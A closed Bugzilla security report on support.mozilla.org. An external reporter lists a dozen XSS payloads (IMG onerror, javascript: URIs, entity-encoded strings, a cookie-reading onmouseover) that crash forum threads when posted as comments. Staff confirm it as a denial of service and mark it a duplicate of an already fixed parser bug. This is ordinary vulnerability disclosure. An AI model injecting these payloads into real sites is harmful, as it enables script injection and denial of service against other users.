Closed Bug 1762422 Opened 4 years ago Closed 4 years ago

Malformed injected <IMG> tag Crashes Forums Topic and questions on support.mozilla.org

Categories

(support.mozilla.org :: General, defect)

defect

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 1762414

People

(Reporter: alisyarief.404, Unassigned)

References

()

Details

(Keywords: reporter-external, wsec-dos, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(1 file)

Attached file File Payload XSS

Paylod XSS (minor) to Crash Forums Topic

  1. Login website https://support.mozilla.org/
  2. Go to https://support.mozilla.org/id/forums/
  3. Comment on Thread Topic with payload below

javascript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
\<a onmouseover="alert(document.cookie)">xxs link\</a>
\<a onmouseover=alert(document.cookie)>xxs link\</a>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">

  1. After comment on topic Forums, thread forums crash and alert :

An Error Occurred
Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.

  1. This not Denial-of-service attack or Rate Limit, because this payload impact only user support.mozilla.org

Impact :

This Dangerous!!! because All Thread Topic on Forum is crash and cannot Error Occurred, and user cannot access this thread.

Supporting Material/References:

Because the proof of concept video file is too big, I uploaded it on youtube and the setting not public :

https://youtu.be/ExRN8xtXd_s

Thanks

Flags: sec-bounty?

After im research Payload XSS to crash Forum Topics :

<IMG SRC="jav ascript:alert('XSS');">

Thanks

Hello Kang,

Thank you for your report.

I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.

The payload that worked for me was <IMG SRC="jav&#x0A;ascript:alert('XSS');">

Thanks,
Frida

Status: UNCONFIRMED → NEW
Type: task → defect
Component: Other → General
Ever confirmed: true
Product: Websites → support.mozilla.org
Keywords: wsec-dos
Summary: Paylod XSS (minor) to Crash Forums Topic Web support.mozilla.org → Malformed injected <IMG> tag Crashes Forums Topic and questions on support.mozilla.org
See Also: → 1762414

(In reply to Frida Kiriakos [:frida] from comment #3)

Hello Kang,

Thank you for your report.

I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.

The payload that worked for me was <IMG SRC="jav&#x0A;ascript:alert('XSS');">

Thanks,
Frida

hy Frida this finding not denial of service but Malformed injected

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users.

This not DOS but inject code to crash menu because this 1 send payload not distributed

Thanks

We consider this bug as Denial of Service since the payload we use in the comments is causing an error on the server side which results in denying access to the topic or question for other users. DoS attack is indeed an attack on the machine or network to make it inaccessible to users and also it includes interruption to an application by exploiting an issue in the application, https://owasp.org/www-community/attacks/Denial_of_Service.

Oke
But this impact is seriously if not patch

Thanks

Of course, the team have already worked on the fix in bug 1762414 and we will let you know when this is deployed so we can verify the fix.

Thanks,
Frida

This is a duplicate of bug 1762414 which has been fixed in prod

Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → DUPLICATE

We we consider the bounty award in the duplicate bug; this turned out to be a symptom of the same parser bug.

Flags: sec-bounty? → sec-bounty-
Group: websites-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: